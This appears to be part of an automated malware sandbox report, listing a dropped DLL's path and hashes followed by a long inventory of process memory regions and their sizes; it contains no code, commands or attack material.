                                                                                                • \Users\Admin\AppData\Local\Win32\Unknown.dll
                                                                                                  MD5

                                                                                                  86114faba7e1ec4a667d2bcb2e23f024

                                                                                                  SHA1

                                                                                                  670df6e1ba1dc6bece046e8b2e573dd36748245e

                                                                                                  SHA256

                                                                                                  568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

                                                                                                  SHA512

                                                                                                  d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

                                                                                                • memory/60-367-0x0000000000000000-mapping.dmp
                                                                                                • memory/564-908-0x0000000000000000-mapping.dmp
                                                                                                • memory/588-159-0x0000000000000000-mapping.dmp
                                                                                                • memory/664-366-0x0000000000000000-mapping.dmp
                                                                                                • memory/724-118-0x0000000000402DF8-mapping.dmp
                                                                                                • memory/724-117-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                  Filesize

                                                                                                  36KB

                                                                                                • memory/808-184-0x0000000000400000-0x000000000042F000-memory.dmp
                                                                                                  Filesize

                                                                                                  188KB

                                                                                                • memory/808-148-0x0000000000000000-mapping.dmp
                                                                                                • memory/808-182-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
                                                                                                  Filesize

                                                                                                  32KB

                                                                                                • memory/808-183-0x0000000001ED0000-0x0000000001ED9000-memory.dmp
                                                                                                  Filesize

                                                                                                  36KB

                                                                                                • memory/944-224-0x0000000000000000-mapping.dmp
                                                                                                • memory/944-227-0x0000000000AC0000-0x0000000000AC1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/944-241-0x00000000052D0000-0x00000000052D1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1008-905-0x0000000000000000-mapping.dmp
                                                                                                • memory/1020-151-0x0000000000000000-mapping.dmp
                                                                                                • memory/1252-221-0x0000000002AA9A6B-mapping.dmp
                                                                                                • memory/1252-220-0x0000000002AA0000-0x0000000002AB5000-memory.dmp
                                                                                                  Filesize

                                                                                                  84KB

                                                                                                • memory/1252-222-0x0000000000790000-0x0000000000791000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1252-223-0x0000000000790000-0x0000000000791000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1276-216-0x0000000004D60000-0x0000000004D61000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1276-231-0x00000000058C0000-0x00000000058C1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1276-178-0x0000000000000000-mapping.dmp
                                                                                                • memory/1276-238-0x0000000005820000-0x0000000005845000-memory.dmp
                                                                                                  Filesize

                                                                                                  148KB

                                                                                                • memory/1276-197-0x0000000000550000-0x0000000000551000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/1332-923-0x0000000000000000-mapping.dmp
                                                                                                • memory/1356-401-0x0000000000000000-mapping.dmp
                                                                                                • memory/1672-972-0x000000000040202B-mapping.dmp
                                                                                                • memory/1676-157-0x0000000000000000-mapping.dmp
                                                                                                • memory/1684-233-0x0000000000000000-mapping.dmp
                                                                                                • memory/1916-769-0x0000000000000000-mapping.dmp
                                                                                                • memory/1988-974-0x0000000000000000-mapping.dmp
                                                                                                • memory/2020-519-0x0000000000000000-mapping.dmp
                                                                                                • memory/2020-538-0x0000000002BB0000-0x0000000002C5E000-memory.dmp
                                                                                                  Filesize

                                                                                                  696KB

                                                                                                • memory/2020-542-0x0000000000400000-0x0000000002BAF000-memory.dmp
                                                                                                  Filesize

                                                                                                  39.7MB

                                                                                                • memory/2116-539-0x0000000000000000-mapping.dmp
                                                                                                • memory/2144-160-0x0000000000000000-mapping.dmp
                                                                                                • memory/2144-194-0x00000000006D0000-0x0000000000700000-memory.dmp
                                                                                                  Filesize

                                                                                                  192KB

                                                                                                • memory/2144-193-0x0000000000450000-0x000000000059A000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/2172-270-0x0000000000000000-mapping.dmp
                                                                                                • memory/2172-308-0x00000000010F0000-0x00000000012D4000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.9MB

                                                                                                • memory/2172-310-0x00000000012E0000-0x00000000016A5000-memory.dmp
                                                                                                  Filesize

                                                                                                  3.8MB

                                                                                                • memory/2232-244-0x0000000000000000-mapping.dmp
                                                                                                • memory/2232-252-0x0000000006FD0000-0x0000000006FD1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2232-265-0x0000000007100000-0x0000000007101000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2232-247-0x0000000003450000-0x0000000003451000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2232-422-0x0000000007103000-0x0000000007104000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2232-271-0x0000000007102000-0x0000000007103000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2232-251-0x0000000003450000-0x0000000003451000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2236-541-0x0000000000000000-mapping.dmp
                                                                                                • memory/2344-232-0x0000000000000000-mapping.dmp
                                                                                                • memory/2348-248-0x00000000010D0000-0x00000000010D1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2348-425-0x0000000004EB3000-0x0000000004EB4000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2348-282-0x0000000007640000-0x0000000007641000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2348-269-0x0000000004EB2000-0x0000000004EB3000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2348-267-0x0000000004EB0000-0x0000000004EB1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2348-249-0x00000000010D0000-0x00000000010D1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2348-257-0x0000000007770000-0x0000000007771000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2348-245-0x0000000000000000-mapping.dmp
                                                                                                • memory/2496-561-0x0000000000000000-mapping.dmp
                                                                                                • memory/2496-163-0x0000000000000000-mapping.dmp
                                                                                                • memory/2520-884-0x0000000000000000-mapping.dmp
                                                                                                • memory/2756-900-0x0000000000000000-mapping.dmp
                                                                                                • memory/2776-153-0x00000000027C0000-0x00000000027D6000-memory.dmp
                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/2776-196-0x0000000002A80000-0x0000000002A96000-memory.dmp
                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/2776-215-0x0000000002BA0000-0x0000000002BB6000-memory.dmp
                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/2776-119-0x0000000002390000-0x00000000023A6000-memory.dmp
                                                                                                  Filesize

                                                                                                  88KB

                                                                                                • memory/2800-562-0x0000000000000000-mapping.dmp
                                                                                                • memory/2816-313-0x0000000000400000-0x00000000007CE000-memory.dmp
                                                                                                  Filesize

                                                                                                  3.8MB

                                                                                                • memory/2816-309-0x000000000068A488-mapping.dmp
                                                                                                • memory/2824-165-0x0000000000000000-mapping.dmp
                                                                                                • memory/2880-406-0x0000000000000000-mapping.dmp
                                                                                                • memory/2948-219-0x0000000000440000-0x000000000058A000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/2948-217-0x0000000000440000-0x000000000058A000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/2948-218-0x0000000000400000-0x0000000000436000-memory.dmp
                                                                                                  Filesize

                                                                                                  216KB

                                                                                                • memory/2980-297-0x000000000329259C-mapping.dmp
                                                                                                • memory/2988-830-0x00000000055D0000-0x00000000055D1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/2988-812-0x0000000000000000-mapping.dmp
                                                                                                • memory/3040-256-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                  Filesize

                                                                                                  128KB

                                                                                                • memory/3040-260-0x0000000000418D32-mapping.dmp
                                                                                                • memory/3040-281-0x0000000005830000-0x0000000005E36000-memory.dmp
                                                                                                  Filesize

                                                                                                  6.0MB

                                                                                                • memory/3048-551-0x0000000000000000-mapping.dmp
                                                                                                • memory/3104-552-0x0000000000000000-mapping.dmp
                                                                                                • memory/3116-619-0x0000000004B52000-0x0000000004B53000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3116-563-0x0000000000000000-mapping.dmp
                                                                                                • memory/3116-797-0x0000000004B53000-0x0000000004B54000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3116-613-0x0000000004B50000-0x0000000004B51000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3164-610-0x00000000032B0000-0x00000000032B1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3164-564-0x0000000000000000-mapping.dmp
                                                                                                • memory/3164-616-0x00000000032B2000-0x00000000032B3000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3164-801-0x00000000032B3000-0x00000000032B4000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3192-131-0x0000000000000000-mapping.dmp
                                                                                                • memory/3220-292-0x0000000000400000-0x0000000000491000-memory.dmp
                                                                                                  Filesize

                                                                                                  580KB

                                                                                                • memory/3220-291-0x0000000002180000-0x000000000220E000-memory.dmp
                                                                                                  Filesize

                                                                                                  568KB

                                                                                                • memory/3220-290-0x00000000004A0000-0x000000000054E000-memory.dmp
                                                                                                  Filesize

                                                                                                  696KB

                                                                                                • memory/3220-250-0x0000000000000000-mapping.dmp
                                                                                                • memory/3364-891-0x0000000003670000-0x00000000036E4000-memory.dmp
                                                                                                  Filesize

                                                                                                  464KB

                                                                                                • memory/3364-888-0x0000000000000000-mapping.dmp
                                                                                                • memory/3364-894-0x0000000003600000-0x000000000366B000-memory.dmp
                                                                                                  Filesize

                                                                                                  428KB

                                                                                                • memory/3432-306-0x0000000000400000-0x0000000000491000-memory.dmp
                                                                                                  Filesize

                                                                                                  580KB

                                                                                                • memory/3432-259-0x0000000000000000-mapping.dmp
                                                                                                • memory/3432-304-0x0000000000590000-0x00000000006DA000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/3432-305-0x0000000000590000-0x00000000006DA000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/3500-166-0x0000000000000000-mapping.dmp
                                                                                                • memory/3664-774-0x0000000000000000-mapping.dmp
                                                                                                • memory/3704-116-0x0000000000440000-0x00000000004EE000-memory.dmp
                                                                                                  Filesize

                                                                                                  696KB

                                                                                                • memory/3704-115-0x0000000000440000-0x00000000004EE000-memory.dmp
                                                                                                  Filesize

                                                                                                  696KB

                                                                                                • memory/3760-176-0x0000000000310000-0x0000000000311000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-229-0x00000000090E0000-0x00000000090E1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-275-0x0000000000310000-0x0000000000311000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-239-0x0000000009130000-0x0000000009131000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-201-0x0000000009200000-0x0000000009201000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-213-0x0000000008F50000-0x0000000008F51000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-206-0x0000000009D10000-0x0000000009D11000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-237-0x0000000009700000-0x0000000009D06000-memory.dmp
                                                                                                  Filesize

                                                                                                  6.0MB

                                                                                                • memory/3760-167-0x00000000003C0000-0x00000000003E0000-memory.dmp
                                                                                                  Filesize

                                                                                                  128KB

                                                                                                • memory/3760-175-0x00000000003D8D4A-mapping.dmp
                                                                                                • memory/3760-177-0x0000000000310000-0x0000000000311000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-189-0x0000000000310000-0x0000000000311000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-210-0x0000000008DA0000-0x0000000008DA1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3760-195-0x00000000003C0000-0x00000000003C1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/3968-896-0x0000000000620000-0x0000000000627000-memory.dmp
                                                                                                  Filesize

                                                                                                  28KB

                                                                                                • memory/3968-895-0x0000000000000000-mapping.dmp
                                                                                                • memory/4236-540-0x0000000000000000-mapping.dmp
                                                                                                • memory/4240-173-0x0000000000000000-mapping.dmp
                                                                                                • memory/4312-890-0x0000000000620000-0x000000000076A000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/4312-893-0x0000000000400000-0x00000000004D9000-memory.dmp
                                                                                                  Filesize

                                                                                                  868KB

                                                                                                • memory/4312-892-0x0000000000770000-0x0000000000846000-memory.dmp
                                                                                                  Filesize

                                                                                                  856KB

                                                                                                • memory/4312-860-0x0000000000000000-mapping.dmp
                                                                                                • memory/4392-140-0x0000000000000000-mapping.dmp
                                                                                                • memory/4392-146-0x00000000008D0000-0x0000000000D08000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.2MB

                                                                                                • memory/4392-145-0x00000000008D0000-0x0000000000D08000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.2MB

                                                                                                • memory/4392-144-0x00000000008D0000-0x0000000000D08000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.2MB

                                                                                                • memory/4392-147-0x00000000008D0000-0x0000000000D08000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.2MB

                                                                                                • memory/4392-143-0x00000000008D0000-0x0000000000D08000-memory.dmp
                                                                                                  Filesize

                                                                                                  4.2MB

                                                                                                • memory/4420-127-0x0000000000402DF8-mapping.dmp
                                                                                                • memory/4444-134-0x0000000000460000-0x0000000000473000-memory.dmp
                                                                                                  Filesize

                                                                                                  76KB

                                                                                                • memory/4444-139-0x0000000000400000-0x0000000000436000-memory.dmp
                                                                                                  Filesize

                                                                                                  216KB

                                                                                                • memory/4444-133-0x0000000000450000-0x000000000045D000-memory.dmp
                                                                                                  Filesize

                                                                                                  52KB

                                                                                                • memory/4444-123-0x0000000000000000-mapping.dmp
                                                                                                • memory/4492-743-0x0000000000000000-mapping.dmp
                                                                                                • memory/4568-130-0x0000000000530000-0x0000000000539000-memory.dmp
                                                                                                  Filesize

                                                                                                  36KB

                                                                                                • memory/4568-129-0x0000000000520000-0x0000000000528000-memory.dmp
                                                                                                  Filesize

                                                                                                  32KB

                                                                                                • memory/4568-120-0x0000000000000000-mapping.dmp
                                                                                                • memory/4580-135-0x0000000000000000-mapping.dmp
                                                                                                • memory/4580-155-0x00000000001C0000-0x00000000001C9000-memory.dmp
                                                                                                  Filesize

                                                                                                  36KB

                                                                                                • memory/4580-154-0x0000000000030000-0x0000000000038000-memory.dmp
                                                                                                  Filesize

                                                                                                  32KB

                                                                                                • memory/4580-156-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                  Filesize

                                                                                                  204KB

                                                                                                • memory/4592-845-0x0000000000000000-mapping.dmp
                                                                                                • memory/4648-904-0x0000000000000000-mapping.dmp
                                                                                                • memory/4660-749-0x0000000000000000-mapping.dmp
                                                                                                • memory/4956-205-0x0000000004E20000-0x0000000004E3B000-memory.dmp
                                                                                                  Filesize

                                                                                                  108KB

                                                                                                • memory/4956-190-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                  Filesize

                                                                                                  204KB

                                                                                                • memory/4956-207-0x0000000004902000-0x0000000004903000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4956-208-0x0000000004903000-0x0000000004904000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4956-242-0x0000000004904000-0x0000000004906000-memory.dmp
                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/4956-211-0x0000000004EF0000-0x0000000004EF1000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4956-202-0x0000000004890000-0x00000000048AC000-memory.dmp
                                                                                                  Filesize

                                                                                                  112KB

                                                                                                • memory/4956-200-0x0000000000400000-0x0000000000433000-memory.dmp
                                                                                                  Filesize

                                                                                                  204KB

                                                                                                • memory/4956-204-0x0000000004900000-0x0000000004901000-memory.dmp
                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/4956-191-0x000000000040CD2F-mapping.dmp
                                                                                                • memory/4964-236-0x0000000000400000-0x0000000000491000-memory.dmp
                                                                                                  Filesize

                                                                                                  580KB

                                                                                                • memory/4964-234-0x00000000004A0000-0x00000000005EA000-memory.dmp
                                                                                                  Filesize

                                                                                                  1.3MB

                                                                                                • memory/4964-186-0x0000000000000000-mapping.dmp
                                                                                                • memory/4964-235-0x00000000006E0000-0x000000000076E000-memory.dmp
                                                                                                  Filesize

                                                                                                  568KB

                                                                                                • memory/4980-179-0x0000000000000000-mapping.dmp